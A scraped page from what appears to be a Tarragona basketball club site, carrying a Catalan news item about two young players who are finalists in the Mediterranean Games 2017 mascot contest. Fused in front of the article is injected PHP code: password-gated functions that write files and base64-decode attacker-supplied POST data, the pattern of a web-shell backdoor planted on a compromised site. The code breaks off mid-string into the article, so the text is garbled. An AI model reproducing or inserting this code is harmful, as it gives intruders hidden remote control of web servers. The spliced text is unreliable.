function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Dos jugadors del Sagrat Cor entre els deu finalistes per triar la mascota dels Jocs Mediterranis 2017 - Tgn Bàsquet Club -

Dos jugadors del Sagrat Cor entre els deu finalistes per triar la mascota dels Jocs Mediterranis 2017

By
Updated: juliol 12, 2015

Dos jugadors del Sagrat Cor formen part de la llista de deu finalistes del concurs Fes la mascota dels Jocs Mediterranis. Blanca de Juanas i Pol Fernández han aconseguit amb els seus dibuixos arribar entre els 10 finalistes dels més de 10.000 nens i nenes que han participat en el concurs. “Vaig decidir fer un cavallet de mar perquè volia representar el mar Mediterrani i fer-ho amb un animal que fos conegut”, diu De Juanas, que té 12 anys i que l’any passat jugava en l’aleví femení que entrenava Iñaki Liarte. El cavallet porta un mocador casteller, una T, el balcó del Mediterrani i com aleta la corona de l’àliga. “Vaig tenir clar de seguida quin animal volia fer i, de fet, ningú em va suggerir res, vaig tenir llibertat total”, explica mentre admet que no pensava arribar tan lluny i assegura que no es troba nerviosa davant la possibilitat de ser l’escollida per guanyar el concurs.

El dibuix de Pol Fernández és més conceptual. Es tracta d’una gota d’aigua que porta com a cinturó el balcó del Mediterrani, mentre que el seu cabell són unes flames. “Volia que tingués els ulls grans perquè m’havia fixat que en les fotos de gats que hi ha per internet, moltes vegades tenen els ulls grossos i a la gent els hi agrada”, diu Fernádez que, com De Juanas, no esperava estar entre els deu finalistes. “Hi havia dibuixos de tot Catalunya, no esperes que et triïn a tu”, afirma mentre assegura que es va inspirar en fer un símbol dels Jocs. “Al començament també vaig pensar a fer alguna cosa similar als Jocs Olímpics de Londres. També li vaig posar ulleres de sol i bigoti, com si fos un turista”, diu tot rient. Ambdós asseguren que no van voler ensenyar els seus dibuixos a ningú abans de presentar-los perquè no volien donar “idees” als altres nens. El guanyador se sabrà el 16 de juliol.

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *